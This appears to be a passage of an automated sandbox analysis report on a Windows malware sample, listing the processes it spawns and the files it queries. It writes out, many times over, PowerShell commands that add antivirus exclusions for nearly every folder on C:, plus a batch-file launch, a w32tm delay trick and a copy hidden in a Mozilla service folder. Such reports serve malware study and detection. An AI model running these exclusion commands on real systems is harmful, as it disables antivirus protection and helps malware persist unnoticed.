Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' Jump to behavior
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat" Jump to behavior
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Queries volume information: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
